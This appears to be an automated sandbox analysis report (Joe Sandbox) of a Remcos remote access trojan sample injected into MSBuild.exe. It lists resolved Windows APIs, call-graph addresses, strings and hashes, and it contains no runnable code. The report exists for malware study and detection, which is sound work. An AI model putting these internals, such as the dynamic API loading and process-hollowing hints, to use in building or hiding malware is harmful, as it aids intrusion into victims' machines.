47401->47129 47402->47140 47403->47115 47404->47120 47405->47123 47406->47128 47407->47144 47408->47148 47409->47152 47410->47157 47411->47147 47412->47154 47413->47161 47414->47165 47415->47168 47416->47170 47417->47172 47418->47149 47419->47156 47483 419e89 103 API calls 47420->47483 47421->46981 47424 40e183 47423->47424 47425 41a65c LoadResource LockResource SizeofResource 47423->47425 47424->47268 47425->47424 47427 401f8e 47426->47427 47433 402325 47427->47433 47429 401fa4 47429->47272 47431 401f86 28 API calls 47430->47431 47432 406066 47431->47432 47432->47279 47434 40232f 47433->47434 47436 40233a 47434->47436 47437 40294a 28 API calls 47434->47437 47436->47429 47437->47436 47439 40250d 47438->47439 47441 40252b 47439->47441 47442 40261a 28 API calls 47439->47442 47441->47283 47442->47441 47443->47304 47445 41bfae 47444->47445 47446 41bfcb 47445->47446 47448 41bfd2 47445->47448 47471 41bfe3 28 API calls 47446->47471 47452 41c552 47448->47452 47449 41bfd0 47449->47304 47451->47294 47453 41c55c __EH_prolog 47452->47453 47454 41c673 47453->47454 47455 41c595 47453->47455 47478 402649 22 API calls std::_Xinvalid_argument 47454->47478 47472 4026a7 28 API calls 47455->47472 47459 41c5a9 47473 41c536 28 API calls 47459->47473 47461 41c5dc 47462 41c603 47461->47462 47463 41c5f7 47461->47463 47475 41c7cf 11 API calls 47462->47475 47474 41c7b2 11 API calls 47463->47474 47466 41c601 47477 41c75a 11 API calls 47466->47477 47467 41c60f 47476 41c7cf 11 API calls 47467->47476 47470 41c63e 47470->47449 47471->47449 47472->47459 47473->47461 47474->47466 47475->47467 47476->47466 47477->47470 47479->47314 47480->47316 47482 401e94 47481->47482 47491 411637 62 API calls 47489->47491 47493 442447 CallUnexpected 47492->47493 47494 442460 47493->47494 47495 44244e 47493->47495 47516 444acc EnterCriticalSection 47494->47516 47528 442595 GetModuleHandleW 47495->47528 47498 442453 47498->47494 47529 4425d9 GetModuleHandleExW 47498->47529 47499 442505 47517 442545 47499->47517 47503 4424dc 47507 4424f4 47503->47507 47538 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47503->47538 47505 442522 47520 442554 47505->47520 47506 44254e 47540 456499 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47506->47540 47539 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47507->47539 47508 442467 47508->47499 47508->47503 47537 4431ef 20 API calls _abort 47508->47537 47516->47508 47541 444b14 LeaveCriticalSection 47517->47541 47519 44251e 47519->47505 47519->47506 47542 447973 47520->47542 47523 442582 47526 4425d9 _abort 8 API calls 47523->47526 47524 442562 GetPEB 47524->47523 47525 442572 GetCurrentProcess TerminateProcess 47524->47525 47525->47523 47527 44258a ExitProcess 47526->47527 47528->47498 47530 442626 47529->47530 47531 442603 GetProcAddress 47529->47531 47533 442635 47530->47533 47534 44262c FreeLibrary 47530->47534 47532 442618 47531->47532 47532->47530 47535 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47533->47535 47534->47533 47536 44245f 47535->47536 47536->47494 47537->47503 47538->47507 47539->47499 47541->47519 47543 447998 47542->47543 47547 44798e 47542->47547 47548 447174 47543->47548 47545 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47546 44255e 47545->47546 47546->47523 47546->47524 47547->47545 47549 4471a0 47548->47549 47550 4471a4 47548->47550 47549->47550 47553 4471c4 47549->47553 47555 447210 47549->47555 47550->47547 47552 4471d0 GetProcAddress 47554 4471e0 __crt_fast_encode_pointer 47552->47554 47553->47550 47553->47552 47554->47550 47556 447226 47555->47556 47557 447231 LoadLibraryExW 47555->47557 47556->47549 47558 447266 47557->47558 47559 44724e GetLastError 47557->47559 47558->47556 47561 44727d FreeLibrary 47558->47561 47559->47558 47560 447259 LoadLibraryExW 47559->47560 47560->47558 47561->47556

                                                Executed Functions

                                                Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                • API String ID: 384173800-625181639
                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 442554-442560 call 447973 483 442582-44258e call 4425d9 ExitProcess 480->483 484 442562-442570 GetPEB 480->484 484->483 485 442572-44257c GetCurrentProcess TerminateProcess 484->485 485->483
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5 call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 85 40d9aa-40d9ac 79->85 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 88 40d9b5-40d9bc 85->88 89 40d9ae-40d9b0 85->89 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 104 40d9d5-40d9d9 93->104 105 40d9ce-40d9d0 93->105 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db-40d9e2 call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 120 40d9e4-40d9e9 call 40699d call 4064d0 109->120 121 40d9ee-40da01 call 401d64 call 401e8f 109->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40dadb call 401d64 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 170->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 199 40dae0-40db1d call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 189->199 203 40dbf5-40dc6a call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338d1 call 401d64 call 40b125 197->203 198->203 199->163 203->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 203->274 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 398 40e022-40e025 395->398 399 40e033-40e038 395->399 396->395 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                APIs
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                • API String ID: 2830904901-1887556364
                                                • Opcode ID: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                • Opcode Fuzzy Hash: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                • CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                • closesocket.WS2_32(?), ref: 0040481F
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                • String ID:
                                                • API String ID: 3658366068-0
                                                • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 464 447210-447224 465 447226-44722f 464->465 466 447231-44724c LoadLibraryExW 464->466 467 447288-44728a 465->467 468 447275-44727b 466->468 469 44724e-447257 GetLastError 466->469 472 447284 468->472 473 44727d-44727e FreeLibrary 468->473 470 447266 469->470 471 447259-447264 LoadLibraryExW 469->471 474 447268-44726a 470->474 471->474 475 447286-447287 472->475 473->472 474->468 476 44726c-447273 474->476 475->467 476->475
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 477 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                APIs
                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorLastMutex
                                                • String ID: (CG
                                                • API String ID: 1925916568-4210230975
                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                Function 00447174 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 488 447174-44719e 489 4471a0-4471a2 488->489 490 447209 488->490 491 4471a4-4471a6 489->491 492 4471a8-4471ae 489->492 493 44720b-44720f 490->493 491->493 494 4471b0-4471b2 call 447210 492->494 495 4471ca 492->495 500 4471b7-4471ba 494->500 496 4471cc-4471ce 495->496 498 4471d0-4471de GetProcAddress 496->498 499 4471f9-447207 496->499 501 4471e0-4471e9 call 4333a7 498->501 502 4471f3 498->502 499->490 503 4471bc-4471c2 500->503 504 4471eb-4471f1 500->504 501->491 502->499 503->494 506 4471c4 503->506 504->496 506->495
                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004471D4
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9
                                                Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 508 43360d-433610 509 43361f-433622 call 43a88c 508->509 511 433627-43362a 509->511 512 433612-43361d call 442200 511->512 513 43362c-43362d 511->513 512->509 516 43362e-433632 512->516 517 433638-433dec call 433d58 call 437bd7 516->517 518 433ded-433e09 call 433d8b call 437bd7 516->518 517->518
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID:
                                                • API String ID: 3476068407-0
                                                • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
